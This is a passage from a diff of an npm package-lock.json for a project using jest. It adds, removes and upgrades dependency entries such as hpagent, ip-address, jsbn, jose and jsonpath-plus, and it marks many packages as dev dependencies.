}, + "license": "MIT", "engines": { - "node": ">=6" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "node_modules/has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-symbols": "^1.0.3" + }, "engines": { - "node": ">=8" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, "node_modules/hasown": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "dev": true, "dependencies": { "function-bind": "^1.1.2" }, @@ -1964,30 +2198,27 @@ "node": ">= 0.4" } }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==" - }, - "node_modules/http-signature": { + "node_modules/hpagent": { "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", "dev": true, - "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - }, + "license": "MIT", "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" + "node": ">=14" } }, + "node_modules/html-escaper": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", + "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", + "dev": true + }, "node_modules/human-signals": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", + "dev": true, "engines": { "node": ">=10.17.0" } @@ -1996,6 +2227,7 @@ "version": "3.2.0", "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", "integrity": "sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", + "dev": true, "dependencies": { "pkg-dir": "^4.2.0", "resolve-cwd": "^3.0.0" @@ -2014,6 +2246,7 @@ "version": "0.1.4", "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", + "dev": true, "engines": { "node": ">=0.8.19" } @@ -2022,6 +2255,7 @@ "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", + "dev": true, "dependencies": { "once": "^1.3.0", "wrappy": "1" @@ -2030,17 +2264,41 @@ "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", + "dev": true + }, + "node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "dev": true, + "license": "MIT", + "dependencies": { + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, + "engines": { + "node": ">= 12" + } + }, + "node_modules/ip-address/node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "dev": true, + "license": "BSD-3-Clause" }, "node_modules/is-arrayish": { "version": "0.2.1", "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==" + "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", + "dev": true }, "node_modules/is-core-module": { "version": "2.15.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", + "dev": true, "dependencies": { "hasown": "^2.0.2" }, @@ -2055,6 +2313,7 @@ "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "dev": true, "engines": { "node": ">=8" } @@ -2063,6 +2322,7 @@ "version": "2.1.0", "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", + "dev": true, "engines": { "node": ">=6" } @@ -2071,6 +2331,7 @@ "version": "7.0.0", "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", + "dev": true, "engines": { "node": ">=0.12.0" } @@ -2079,6 +2340,7 @@ "version": "2.0.1", "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", + "dev": true, "engines": { "node": ">=8" }, @@ -2086,16 +2348,11 @@ "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==", - "dev": true - }, "node_modules/isexe": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" + "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", + "dev": true }, "node_modules/isomorphic-ws": { "version": "5.0.0", @@ -2106,16 +2363,11 @@ "ws": "*" } }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==", - "dev": true - }, "node_modules/istanbul-lib-coverage": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", + "dev": true, "engines": { "node": ">=8" } @@ -2124,6 +2376,7 @@ "version": "5.2.1", "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", + "dev": true, "dependencies": { "@babel/core": "^7.12.3", "@babel/parser": "^7.14.7", @@ -2139,6 +2392,7 @@ "version": "3.0.1", "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", + "dev": true, "dependencies": { "istanbul-lib-coverage": "^3.0.0", "make-dir": "^4.0.0", @@ -2152,6 +2406,7 @@ "version": "4.0.1", "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", + "dev": true, "dependencies": { "debug": "^4.1.1", "istanbul-lib-coverage": "^3.0.0", @@ -2165,6 +2420,7 @@ "version": "3.1.7", "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", + "dev": true, "dependencies": { "html-escaper": "^2.0.0", "istanbul-lib-report": "^3.0.0" @@ -2177,6 +2433,7 @@ "version": "10.9.2", "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.2.tgz", "integrity": "sha512-2P4SQ0HrLQ+fw6llpLnOaGAvN2Zu6778SJMrCUwns4fOoG9ayrTiZk3VV8sCPkVZF8ab0zksVpS8FDY5pRCNBA==", + "dev": true, "dependencies": { "async": "^3.2.3", "chalk": "^4.0.2", @@ -2194,6 +2451,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", + "dev": true, "dependencies": { "@jest/core": "^29.7.0", "@jest/types": "^29.6.3", @@ -2219,6 +2477,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", + "dev": true, "dependencies": { "execa": "^5.0.0", "jest-util": "^29.7.0", @@ -2232,6 +2491,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", + "dev": true, "dependencies": { "@jest/environment": "^29.7.0", "@jest/expect": "^29.7.0", @@ -2262,6 +2522,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", + "dev": true, "dependencies": { "@jest/core": "^29.7.0", "@jest/test-result": "^29.7.0", @@ -2294,6 +2555,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", + "dev": true, "dependencies": { "@babel/core": "^7.11.6", "@jest/test-sequencer": "^29.7.0", @@ -2338,6 +2600,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", + "dev": true, "dependencies": { "chalk": "^4.0.0", "diff-sequences": "^29.6.3", @@ -2352,6 +2615,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", + "dev": true, "dependencies": { "detect-newline": "^3.0.0" }, @@ -2363,6 +2627,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "chalk": "^4.0.0", @@ -2378,6 +2643,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", + "dev": true, "dependencies": { "@jest/environment": "^29.7.0", "@jest/fake-timers": "^29.7.0", @@ -2394,6 +2660,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", + "dev": true, "engines": { "node": "^14.15.0 || ^16.10.0 || >=18.0.0" } @@ -2402,6 +2669,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "@types/graceful-fs": "^4.1.3", @@ -2426,6 +2694,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", + "dev": true, "dependencies": { "jest-get-type": "^29.6.3", "pretty-format": "^29.7.0" @@ -2438,6 +2707,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", + "dev": true, "dependencies": { "chalk": "^4.0.0", "jest-diff": "^29.7.0", @@ -2452,6 +2722,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", + "dev": true, "dependencies": { "@babel/code-frame": "^7.12.13", "@jest/types": "^29.6.3", @@ -2471,6 +2742,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "@types/node": "*", @@ -2484,6 +2756,7 @@ "version": "1.2.3", "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", + "dev": true, "engines": { "node": ">=6" }, @@ -2500,6 +2773,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", + "dev": true, "engines": { "node": "^14.15.0 || ^16.10.0 || >=18.0.0" } @@ -2508,6 +2782,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", + "dev": true, "dependencies": { "chalk": "^4.0.0", "graceful-fs": "^4.2.9", @@ -2527,6 +2802,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", + "dev": true, "dependencies": { "jest-regex-util": "^29.6.3", "jest-snapshot": "^29.7.0" @@ -2539,6 +2815,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", + "dev": true, "dependencies": { "@jest/console": "^29.7.0", "@jest/environment": "^29.7.0", @@ -2570,6 +2847,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", + "dev": true, "dependencies": { "@jest/environment": "^29.7.0", "@jest/fake-timers": "^29.7.0", @@ -2602,6 +2880,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", + "dev": true, "dependencies": { "@babel/core": "^7.11.6", "@babel/generator": "^7.7.2", @@ -2632,6 +2911,7 @@ "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, "bin": { "semver": "bin/semver.js" }, @@ -2643,6 +2923,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "@types/node": "*", @@ -2659,6 +2940,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "camelcase": "^6.2.0", @@ -2675,6 +2957,7 @@ "version": "6.3.0", "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", + "dev": true, "engines": { "node": ">=10" }, @@ -2686,6 +2969,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", + "dev": true, "dependencies": { "@jest/test-result": "^29.7.0", "@jest/types": "^29.6.3", @@ -2704,6 +2988,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", + "dev": true, "dependencies": { "@types/node": "*", "jest-util": "^29.7.0", @@ -2718,6 +3003,7 @@ "version": "8.1.1", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "dev": true, "dependencies": { "has-flag": "^4.0.0" }, @@ -2729,11 +3015,11 @@ } }, "node_modules/jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", + "version": "6.0.11", + "resolved": "https://registry.npmjs.org/jose/-/jose-6.0.11.tgz", + "integrity": "sha512-QxG7EaliDARm1O1S8BGakqncGT9s25bKL1WSf6/oa17Tkqwi8D2ZNglqCF+DsYF88/rV66Q/Q2mFAy697E1DUg==", "dev": true, - "optional": true, + "license": "MIT", "funding": { "url": "https://github.com/sponsors/panva" } @@ -2741,7 +3027,8 @@ "node_modules/js-tokens": { "version": "4.0.0", "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==" + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", + "dev": true }, "node_modules/js-yaml": { "version": "4.1.0", @@ -2756,15 +3043,27 @@ } }, "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==", - "dev": true + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "dev": true, + "license": "MIT" + }, + "node_modules/jsep": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", + "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 10.16.0" + } }, "node_modules/jsesc": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", + "dev": true, "bin": { "jsesc": "bin/jsesc" }, @@ -2775,30 +3074,14 @@ "node_modules/json-parse-even-better-errors": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==" - }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==", - "dev": true - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", - "dev": true - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==", + "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", "dev": true }, "node_modules/json5": { "version": "2.2.3", "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", + "dev": true, "bin": { "json5": "lib/cli.js" }, @@ -2807,33 +3090,29 @@ } }, "node_modules/jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==", - "dev": true, - "engines": { - "node": ">=12.0.0" - } - }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": 